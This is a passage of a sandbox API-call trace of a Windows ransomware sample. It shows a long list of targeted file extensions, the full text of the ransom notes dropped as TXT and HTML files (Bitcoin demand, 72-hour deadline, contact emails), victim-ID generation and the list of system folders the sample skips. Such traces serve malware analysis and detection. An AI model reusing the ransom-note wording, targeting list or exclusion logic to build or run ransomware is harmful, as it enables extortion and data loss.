pt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0171.687] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e86782, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e86782, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e86782, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0171.688] FindClose (in: hFindFile=0xfb8f30 | out: hFindFile=0xfb8f30) returned 1
	[0171.688] FindClose (in: hFindFile=0xfb8f30 | out: hFindFile=0xfb8f30) returned 0
	[0171.688] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime"
	[0171.688] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*"
	[0171.689] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.689] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.689] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0171.689] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.695] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0171.695] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0171.699] CloseHandle (hObject=0x39c) returned 1
	[0171.699] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.700] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.700] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0171.701] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0171.701] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.701] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0171.702] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0171.702] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0171.702] CloseHandle (hObject=0x39c) returned 1
	[0171.703] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.703] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.703] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0171.703] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0171.703] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.704] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0171.704] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0171.707] CloseHandle (hObject=0x39c) returned 1
	[0171.707] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.707] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.708] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0171.712] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.712] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.716] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0171.717] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.717] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0171.717] CloseHandle (hObject=0x39c) returned 1
	[0171.718] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7fdfad74, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb9670
	[0171.718] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*") returned 97
	[0171.718] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.718] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*") returned 0x61
	[0171.718] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.719] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0171.719] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.719] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0171.719] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.719] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0171.719] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.719] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.719] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.720] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0171.720] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.720] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0171.720] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.720] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.720] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.720] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0171.721] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.721] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0171.721] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.721] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0171.721] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.721] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0171.721] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.722] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0171.722] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.722] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.722] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.722] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0171.722] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.722] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0171.722] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0171.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0171.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0171.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.724] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0171.724] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0171.724] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0171.724] FindNextFileW (in: hFindFile=0xfb9670, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7fdfad74, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0171.724] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0171.724] FindNextFileW (in: hFindFile=0xfb9670, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fdfad74, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fdfad74, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fe20fa6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.724] FindNextFileW (in: hFindFile=0xfb9670, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fdd4b8e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fdd4b8e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fdfad74, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.724] FindNextFileW (in: hFindFile=0xfb9670, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e3a2a4, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e3a2a4, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e60513, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0171.724] FindNextFileW (in: hFindFile=0xfb9670, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e86782, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e86782, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e86782, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0171.725] FindNextFileW (in: hFindFile=0xfb9670, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e86782, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e86782, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e86782, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0171.725] FindClose (in: hFindFile=0xfb9670 | out: hFindFile=0xfb9670) returned 1
	[0171.725] FindClose (in: hFindFile=0xfb9670 | out: hFindFile=0xfb9670) returned 0
